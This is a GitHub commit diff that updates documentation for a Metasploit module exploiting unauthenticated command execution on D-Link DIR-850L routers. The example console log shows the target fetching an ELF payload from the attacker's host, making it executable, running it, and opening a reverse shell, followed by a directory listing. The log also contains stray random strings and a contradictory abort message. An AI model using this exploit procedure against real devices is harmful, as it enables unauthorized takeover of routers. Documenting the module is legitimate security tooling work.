Skip to content

Commit 40bcb3f

Browse files
author
Austin
authored
update documentation
1 parent 32a75e9 commit 40bcb3f

File tree

1 file changed

+44
-9
lines changed

1 file changed

+44
-9
lines changed

documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md

Lines changed: 44 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing
1616
## Example
1717

1818
```
19-
msf > use exploit/linux/http/dlink_850l_unauth_exec
19+
msf > use exploit/linux/http/dlink_dir850l_unauth_exec
2020
msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
2121
RHOST => 192.168.0.14
2222
msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
@@ -26,15 +26,50 @@ LHOST => ens3
2626
msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
2727
LPORT => 1351
2828
msf exploit(dlink_850l_unauthenticated_exec) > run
29+
[*] Exploit running as background job 0.
2930
3031
[*] Started reverse TCP handler on 192.168.0.11:1351
31-
[*] 192.168.0.14:80 - Initiating exploitation...
32-
[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl
33-
[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl
34-
[*] 192.168.0.14:80 - Retrieving uid and auth challenge...
35-
[*] Command Stager progress - 100.00% done (101/101 bytes)
36-
[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl
37-
[*] Sending payload to 192.168.0.14 (Wget)
38-
[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400
32+
msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO
33+
[*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO
34+
[*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO
35+
[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO
36+
[*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
37+
[*] 192.168.0.14:80 - Sending payload to the server...
38+
[*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO
39+
[*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO
40+
[*] 192.168.0.14:80 - Waiting for shell to connect back to us...
41+
[*] Sending stage (84 bytes) to 192.168.0.14
42+
[*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400
43+
[+] Deleted /tmp/dhufstzw
44+
sessions -i 1
45+
[*] Starting interaction with 1...
46+
47+
3353690789
48+
yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC
49+
true
50+
MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA
51+
mMzxldJdkNYWlIrHrOazzOcpCRTuRipt
52+
OayNFBMDfTSaJIFwpNPoWErXCvLmIguK
53+
[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
3954
[*] Server stopped.
55+
pwd
56+
/
57+
ls
58+
www
59+
var
60+
usr
61+
tmp
62+
sys
63+
sbin
64+
proc
65+
mydlink
66+
mnt
67+
lib
68+
include
69+
htdocs
70+
home
71+
etc
72+
dev
73+
bin
74+
4075
```

0 commit comments

Comments
 (0)